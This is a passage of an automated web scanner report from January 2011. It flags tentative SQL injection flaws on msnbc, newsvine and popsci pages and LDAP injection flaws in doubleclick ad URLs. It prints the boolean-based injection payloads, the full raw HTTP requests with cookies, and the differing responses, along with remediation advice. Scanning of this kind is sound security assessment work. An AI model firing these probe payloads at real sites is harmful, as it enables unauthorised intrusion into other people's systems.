1.128. http://www.msnbc.redacted/id/8004316/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.msnbc.redacted
Path:
/id/8004316/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 42860396'%20or%201%3d1--%20 and 42860396'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /id/8004316/?142860396'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Cnection: close Expires: Sun, 30 Jan 2011 01:59:31 GMT Date: Sun, 30 Jan 2011 01:59:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 163390
<html><head><title>Top Videos - Videos & Clips of Top News Stories & Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe ...[SNIP]... <img src="http://c.redacted/c.gif?NC=1180&NA=1154&PS=69715&PI=7329&DI=305&TP=http%3a%2f%2fmsnbc.msn.com%2fid%2f8004316%2f &RID=76faf60ebb3048f380f19f80f363b3cb" width="0" height="0" border="0" alt="" /><div id="nm_c1" class="nmX"> </div><div id="nm_c2" class="nmX"> </div><div id="nm_c3" class="nmX"> </div><div id="nm_c4" class="nmX"> </div> <script language="JavaScript" type="text/javascript"> var tpValue='http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f'; var psValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305'; psValue=psValue.substr(psValue.indexOf("PS=")); psValue=psValue.substr(3,psValue.indexOf("&")-3); var diValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305'; diValue=diValue.substr(diValue.indexOf("DI=")); diValue=diValue.substr(3); var piValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305'; piValue=piValue.substr(piValue.indexOf("PI=")); piValue=piValue.substr(3,piValue.indexOf("&")-3);
$.track({trackInfoOpts:{sitePage:{pageName:s_msn.pageName,domainId:diValue,propertyId:piValue,propertySpecific:psValue,sourceUrl:document.URL,tp:'http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f',referrer:document.referrer},userStatic:{requestId:'76faf60ebb3048f380f19f80f363b3cb'}},spinTimeout:150}) .register(new $.track.genericTracking({base:"http://udc.redacted/c.gif?",linkTrack:0,commonMap:{sitePage:{di:'domainId',pn:'pageName',pi:'propertyId',ps:'propertySpecific',su:'sourceUrl',cu:'tp'} , userStatic:{rid:'requestId',clid:'requestId'}, client:{rf:'referrer',bh:'height',bw:'width',scr:'screenResolution',sd:'colorDepth'}},impr:{param:{evt:'impr',js:'1'}}})); </script><script type="text/javascript"> $.track.trackPage(); </script><div style="display:none;"> <script type="text/javascript"> var axel = Math.random() + ""; var a = axel * 10000000000000; document.write('<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=' + a + '?" width="1" height="1" alt=""/>'); </script> <noscript> <img src="http://ad.doubleclick.ne ...[SNIP]...
Request 2
GET /id/8004316/?142860396'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.msnbc.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Pragma: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-Cnection: close Expires: Sun, 30 Jan 2011 01:59:32 GMT Date: Sun, 30 Jan 2011 01:59:32 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: SSLB=0; path=/; domain=.msnbc.redacted Content-Length: 165323
<html><head><title>Top Videos - Videos & Clips of Top News Stories & Headlines - msnbc.com- msnbc.com</title><link rel="stylesheet" type="text/css" href="/css/html40.css" /><link rel="styleshe ...[SNIP]... <img src="http://c.redacted/c.gif?NC=1180&NA=1154&PS=69715&PI=7329&DI=305&TP=http%3a%2f%2fmsnbc.msn.com%2fid%2f8004316%2f &RID=c70c5131d3b644bfbb8884572e01c494" width="0" height="0" border="0" alt="" /><div id="nm_c1" class="nmX"> </div><div id="nm_c2" class="nmX"> </div><div id="nm_c3" class="nmX"> </div><div id="nm_c4" class="nmX"> </div> <script language="JavaScript" type="text/javascript"> var tpValue='http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f'; var psValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305'; psValue=psValue.substr(psValue.indexOf("PS=")); psValue=psValue.substr(3,psValue.indexOf("&")-3); var diValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305'; diValue=diValue.substr(diValue.indexOf("DI=")); diValue=diValue.substr(3); var piValue='NC=1255&NA=1154&PS=69715&PI=7329&DI=305'; piValue=piValue.substr(piValue.indexOf("PI=")); piValue=piValue.substr(3,piValue.indexOf("&")-3);
$.track({trackInfoOpts:{sitePage:{pageName:s_msn.pageName,domainId:diValue,propertyId:piValue,propertySpecific:psValue,sourceUrl:document.URL,tp:'http%3a%2f%2fmsnbc.redacted%2fid%2f8004316%2f',referrer:document.referrer},userStatic:{requestId:'c70c5131d3b644bfbb8884572e01c494'}},spinTimeout:150}) .register(new $.track.genericTracking({base:"http://udc.redacted/c.gif?",linkTrack:0,commonMap:{sitePage:{di:'domainId',pn:'pageName',pi:'propertyId',ps:'propertySpecific',su:'sourceUrl',cu:'tp'} , userStatic:{rid:'requestId',clid:'requestId'}, client:{rf:'referrer',bh:'height',bw:'width',scr:'screenResolution',sd:'colorDepth'}},impr:{param:{evt:'impr',js:'1'}}})); </script><script type="text/javascript"> $.track.trackPage(); </script><div style="display:none;"> <script type="text/javascript"> var axel = Math.random() + ""; var a = axel * 10000000000000; document.write('<img src="http://ad.doubleclick.net/activity;src=2183402;type=count651;cat=msnbc778;ord=1;num=' + a + '?" width="1" height="1" alt=""/>'); </script> <noscript> <img src="http://ad.doubleclick.ne ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 77049328'%20or%201%3d1--%20 and 77049328'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_nv/cms/help77049328'%20or%201%3d1--%20/faq HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:19:10 GMT Content-Length: 15052 Connection: close
GET /_nv/cms/help77049328'%20or%201%3d2--%20/faq HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:19:10 GMT Content-Length: 15042 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 20335452'%20or%201%3d1--%20 and 20335452'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_static20335452'%20or%201%3d1--%20/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:24 GMT Content-Length: 15052 Connection: close
GET /_static20335452'%20or%201%3d2--%20/css/7df13afbd185e2574d9f79651dc425a61a7d8525.css HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:16:24 GMT Content-Length: 15040 Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 11619636'%20or%201%3d1--%20 and 11619636'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_static11619636'%20or%201%3d1--%20/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:03:08 GMT Content-Length: 15040 Connection: close
GET /_static11619636'%20or%201%3d2--%20/css/abc971d9360e9443226fdd00adea8012ad3cb93a.css HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 02:03:08 GMT Content-Length: 15050 Connection: close
1.132. http://www.polls.newsvine.com/_vine/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.polls.newsvine.com
Path:
/_vine/search
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14284000%20or%201%3d1--%20 and 14284000%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /_vine/search?114284000%20or%201%3d1--%20=1 HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:15:40 GMT Content-Length: 17462 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /_vine/search?114284000%20or%201%3d2--%20=1 HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:15:40 GMT Content-Length: 17472 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.133. http://www.polls.newsvine.com/environment [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.polls.newsvine.com
Path:
/environment
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /environment?1%20and%201%3d1--%20=1 HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 1
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:18:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57792
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
GET /environment?1%20and%201%3d2--%20=1 HTTP/1.1 Host: www.polls.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;
Response 2
HTTP/1.1 200 OK Server: Apache/2.2.9 (Debian) TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Pragma: no-cache Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=300 Date: Sun, 30 Jan 2011 03:18:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 57802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
1.134. http://www.popsci.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.popsci.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 72683569'%20or%201%3d1--%20 and 72683569'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /?172683569'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.popsci.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:23:52 GMT Server: Apache Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=v2tc6q1pdr66s599a60pjsel52; expires=Tue, 22-Feb-2011 06:57:12 GMT; path=/; domain=.popsci.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 30 Jan 2011 03:23:52 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent X-Server-Name: web4c D=414802 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<head> <meta http- ...[SNIP]... <a href="http://www.bmxmag.biz/existing.php" style="display: none;">bmxmag-ps</a></div> <!-- Begin comScore Tag --> <script> document.write(unescape("%3Cscript src='" + (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js' %3E%3C/script%3E")); </script> <script> COMSCORE.beacon({ c1:2, c2:"6035029", c3:" ", c4:" ", c5:"", c6:"", c15:" " }); </script> <noscript> <img src="http://b.scorecardresearch.com/b?c1=2&c2=6035029&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /> </noscript> <!-- End comScore Tag --> <!-- Start Quantcast tag --> <script type="text/javascript"> _qoptions={ qacct:"p-cafODhhaQOlCs" }; </script> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script> <noscript> <img src="http://pixel.quantserve.com/pixel/p-cafODhhaQOlCs.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/> </noscript> <!-- End Quantcast tag --><!-- START Nielsen Online SiteCensus V6.0 --> <!-- COPYRIGHT 2010 Nielsen Online --> <script type="text/javascript"> (function () { var d = new Image(1, 1); d.onerror = d.onload = function () { d.onerror = d.onload = null; }; d.src = ["//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&si=", escape(window.location.href), "&rp=", escape(document.referrer), "&ts=compact&rnd=", (new Date()).getTime()].join(''); })(); </script> <noscript> <div> <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-903454h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" /> </div> </noscript> <!-- END Nielsen Online SiteCensus V6.0 --> <!-- SiteCatalyst code version: H.13. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!-- s_account="timepopsci" //--></script> <script language="JavaScript" src="/sites/all/modules/omniture/ ...[SNIP]...
Request 2
GET /?172683569'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.popsci.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.0 200 OK Date: Sun, 30 Jan 2011 03:23:53 GMT Server: Apache Set-Cookie: SESS98684d1eb89eae890ac2d30814f7062d=goltn6f70re8ngu8p1kkhfp8r7; expires=Tue, 22-Feb-2011 06:57:13 GMT; path=/; domain=.popsci.com Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Sun, 30 Jan 2011 03:23:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Vary: Accept-Encoding,User-Agent X-Server-Name: web4c D=688223 Connection: close Content-Type: text/html; charset=utf-8 Content-Language: en
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The TargetID parameter appears to be vulnerable to LDAP injection attacks.
The payloads 91b687f6f8a6bf15)(sn=* and 91b687f6f8a6bf15)!(sn=* were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=91b687f6f8a6bf15)(sn=*&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:40:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5224
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) - ...[SNIP]... <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.swf"; var gif = "http://s0.2mdn.net/2981993/300x250_PostHoliday_Citrus.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B1-0%3B0%3B57860936%3B4307-300/250%3B40005125/40022912/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
GET /adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003J/52000000000037696.1?!&&PID=8058174&UIT=G&TargetID=91b687f6f8a6bf15)!(sn=*&AN=1895959499&PG=NBCMSN&ASID=88afdf6554cf4226bcbb92e543b579f1&destination=;ord=1895959499? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 01:40:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5236
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,335 Template Name = Watermark Banner Creative (Flash) - ...[SNIP]... <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_VORTEX.swf"; var gif = "http://s0.2mdn.net/2981993/300x250_122510_POST_HOL_VORTEX.jpg"; var minV = 6; var FWH = ' width="300" height="250" '; var url = escape("http://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = "same as SWF"; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 600; var winH = 400; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9f/7/0/%2a/q%3B234336715%3B0-0%3B0%3B57860936%3B4307-300/250%3B40005122/40022909/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://specialoffers.verizonwireless.com/smartphonesale?cid=BAC-prodrsch"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
The TargetID parameter appears to be vulnerable to LDAP injection attacks.
The payloads 8d3e8d3d71eda696)(sn=* and 8d3e8d3d71eda696)!(sn=* were each submitted in the TargetID parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /adi/N3382.no_url_specifiedOX2487/B5076164.5;sz=300x250;pc=[TPAS_ID];click=;dcopt=rcl;click0=http://wrapper.g.redacted/GRedirect.aspx?g.redacted/2AD0003R/18000000000034994.1?!&&PID=8013958&UIT=G&TargetID=8d3e8d3d71eda696)(sn=*&AN=1915357353&PG=INVHP1&ASID=44067efed79e4b8aa8ddf5afab779111&destination=;ord=1915357353? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 30 Jan 2011 14:49:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 5832
